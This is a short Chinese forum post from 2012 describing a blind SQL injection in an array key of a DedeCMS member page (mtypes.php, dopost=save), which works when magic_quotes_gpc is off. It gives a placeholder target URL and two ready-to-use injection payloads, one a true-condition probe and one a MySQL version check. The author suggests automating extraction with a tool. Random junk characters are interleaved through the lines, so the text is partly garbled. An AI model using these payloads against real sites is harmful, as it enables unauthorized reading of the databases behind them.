需要magic_quotes_gpc = Off,所以说是鸡肋啊.
( j8 l z* z- D* F. a
$ X( T0 t) D8 ?5 K- \5 S 1 O$ Y2 p4 ]- s% l1 e
发生在数组key里的注射漏洞,有点意思.
) ^4 i7 b* @$ C t! D + A, r9 o& }! Q6 B1 l6 K
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
8 x: y# @* }- }% Q& m) \ 7 W! ]8 r# ]- T
http://www.xxx.com /dede/member/mtypes.php?dopost=save+ C/ x9 [- }1 v, `: o
+ u3 m g, a5 s4 x: [( j
exploit:6 e% Y g1 _3 f# ~" ^4 U- H
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r. j* _/ f9 x$ N; Z5 h& `# T7 c3 u T
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r; [7 \6 y+ z. U) c2 }
|
发表于 2012-12-20 08:08:09
收藏
支持
反对